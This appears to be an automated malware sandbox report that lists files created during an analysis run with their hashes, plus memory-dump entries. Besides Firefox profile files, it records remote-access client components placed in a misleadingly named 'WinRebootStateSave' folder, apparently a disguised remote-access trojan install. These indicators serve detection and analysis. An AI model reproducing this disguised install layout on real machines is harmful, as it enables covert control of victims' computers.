4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
28525f0d4fc5faa9d40ff1b936ccd76e

SHA1
a20ea35dbc918e9550853f3a221feee69488b225

SHA256
dfd88885c928b4396dc1b1db64cde4fc8396bfd89b7131fe79f8ed36bf7a359b

SHA512
04f7f27fbaff06788c6cafa395166ec3bfb213a64005c6df3b6388928ef3d809ed7df479332e24c906c79c5c3be97dbba6a1ca04808e2bb34012f1b9d9d210ab

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\pending_pings\0f895217-c4dc-4dc7-94e3-f5f8ab52b176

Filesize
746B

MD5
67f61376d3377c291c3da4591c7f8ec2

SHA1
beabc46769a99e1c4973758729d3811760e2608c

SHA256
e8811f272f30dd086190d20db4e62976d0272c97a08035312f9259f77597c6cc

SHA512
756981173508ded4b44e3e538421234e6503461a6c008add001b247cde472b856d2b4994ef42c7e1e3da684dc56b3cc5dde479992a597797784d6e358181939f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\pending_pings\37eb01e7-50f8-48e9-ba19-41374b09154a

Filesize
10KB

MD5
62e01619c1e646cd1aa4c84fa448d954

SHA1
b3d52e8087498fa5f42fff89d8963bbf0bd87302

SHA256
df21adb62057fcfd16a5ec3a02cc423bbdc5ba903afba7cb6f891797a0d8d55e

SHA512
7b417a19e180b3f228334745fb5c954b3cacc55f170118ed3994a043302dcf30eda849c3bdc7958903c91462c50240a211898da815b3c56e808ecbe89cac7af6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs-1.js

Filesize
6KB

MD5
15e70a68f382247447a9f97dd92a268d

SHA1
bb69111b9f9da6e94d6039730fd1d48cc07faa33

SHA256
7f812d3fcc6a91b646ef82cd319d0eee75b4f3074f04fa4f53b33f0ca4d20104

SHA512
80655d2d428a327879c4885b02852dc2125b412973c71ea330c8c1e9d07c7b5038865b1e4898cd259ed473f095b3c4244313cf6f2d8f22ea4a5a29bf769bd0fa

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js

Filesize
6KB

MD5
716e9caad78b7e4e353044c0e2920a2b

SHA1
4aa1703230a7aba12f8472a2448b128c1f40c8e2

SHA256
699fc83f70230fe71d23ab09c7449e324ac01c32e247466989940b5f79725f8f

SHA512
26ddad9d9c294030034e749b548804049939e0d01e61b4d429b2bce65667d507648ff21f9c609ddab815c556dce6f3d6d4be56db113bba0bd85a7ee727107a82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js

Filesize
6KB

MD5
d3f15db924168db46e4286fde64ea3f2

SHA1
1601623f2a0e317bc791ca0bbfb5d11cb8c293a5

SHA256
daffdc72ce68bda65a87c138aaecd7dc756328100708635b9ee9eafba1b0119d

SHA512
cafe038bcdb4a5b576eb03f375bf38dba5eaa074a13f0d1e7758585e112875a25a0fc1a2f14294bd23647fe24c62f87aa7fe30222fb1fb19122c72ab9abab9bb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\sessionCheckpoints.json

Filesize
259B

MD5
700fe59d2eb10b8cd28525fcc46bc0cc

SHA1
339badf0e1eba5332bff317d7cf8a41d5860390d

SHA256
4f5d849bdf4a5eeeb5da8836589e064e31c8e94129d4e55b1c69a6f98fb9f9ea

SHA512
3fa1b3fd4277d5900140e013b1035cb4c72065afcc6b6a8595b43101cfe7d09e75554a877e4a01bb80b0d7a58cdcfe553c4a9ef308c5695c5e77cb0ea99bada4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\sessionstore.jsonlz4

Filesize
886B

MD5
44cb50ffa3d5267d35165774f32a1a45

SHA1
8fe658c28edbb1a519dff06dba4983dbe183679f

SHA256
cd677a3ffc42a74d3eda68005a9c10486e222beb884a12519fbca847db0a6ca1

SHA512
93d10b21d7a5d47be34780d57cc2c95a0c174ebe5979eb4eab2c38e1a62626a931a797cd749e8127f08ea1d93f9edf759b6aea7df4d3b7e96988be72ae24c501

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
184KB

MD5
3018d1aad8385b734068dbad441e344e

SHA1
2a3925bc92ec843db64b6db2cd6fe18ccf084a86

SHA256
f33415b0b1fc8c7e52356318d44aef1ae6bd9c64a89afa012d43a01a79954f88

SHA512
7ab1a1115a4f7ac61ba41bfe5875792cfa84d81f14f71239e43848de5940bfa07e2e34ea4be85a61c091d0b4b7742f3f55961fd26734b528cdb2c0b4d169c5e0

Download Submit
C:\Users\Admin\AppData\Roaming\WinRebootStateSave\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\WinRebootStateSave\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\WinRebootStateSave\NSM.LIC

Filesize
253B

MD5
12b8cc1d0a34012bbbbe86880333c567

SHA1
e89659c412af82e31e6d14c34e47d7cc4c5ec9a5

SHA256
9c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f

SHA512
eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc

Download Submit
C:\Users\Admin\AppData\Roaming\WinRebootStateSave\PCICL32.dll

Filesize
3.5MB

MD5
d16ffa06a35601a73b73836bf905ed19

SHA1
b8231d36f921e5b75b592ea3374f19216a5c411f

SHA256
80cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab

SHA512
e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168

Download Submit
C:\Users\Admin\AppData\Roaming\WinRebootStateSave\client32.exe

Filesize
33KB

MD5
290c26b1579fd3e48d60181a2d22a287

SHA1
e4c91a7f161783c68cf67250206047f23bd25a29

SHA256
973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128

SHA512
114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

Download Submit
C:\Users\Admin\AppData\Roaming\WinRebootStateSave\client32.ini

Filesize
741B

MD5
1ca43089351190677ff032232dde642e

SHA1
eaea1474200eb9becb9ac478c832842b2277c579

SHA256
b3042ebea4fae7bfb07db2c279783aeb1fce1ea6248fbaf25980478d8ecc9ce0

SHA512
793b7ec6f118325d2a40c68e04c4459420ab1b949cc1e9be0cf88a85b2f6ed0b7023d47396afc35e3fe43a92918dc23abce69fd873322f86c5bdadb85d068be2

Download Submit
C:\Users\Admin\AppData\Roaming\WinRebootStateSave\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
\Users\Admin\AppData\Roaming\WinRebootStateSave\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
memory/1620-120-0x000001443A550000-0x000001443A572000-memory.dmp

Filesize
136KB

Download
memory/1620-33-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/1620-195-0x000001443A9A0000-0x000001443A9AA000-memory.dmp

Filesize
40KB

Download
memory/1620-182-0x000001443A5D0000-0x000001443A5E2000-memory.dmp

Filesize
72KB

Download
memory/1620-25-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/1620-167-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/1620-160-0x000001443A5B0000-0x000001443A5C2000-memory.dmp

Filesize
72KB

Download
memory/1620-26-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/1620-159-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/1620-357-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/4092-3-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

Filesize
4KB

Download
memory/4092-366-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/4092-169-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/4092-18-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/4092-9-0x000001BFDD400000-0x000001BFDD476000-memory.dmp

Filesize
472KB

Download
memory/4092-8-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

Filesize
9.9MB

Download
memory/4092-5-0x000001BFC4D30000-0x000001BFC4D52000-memory.dmp

Filesize
136KB

Download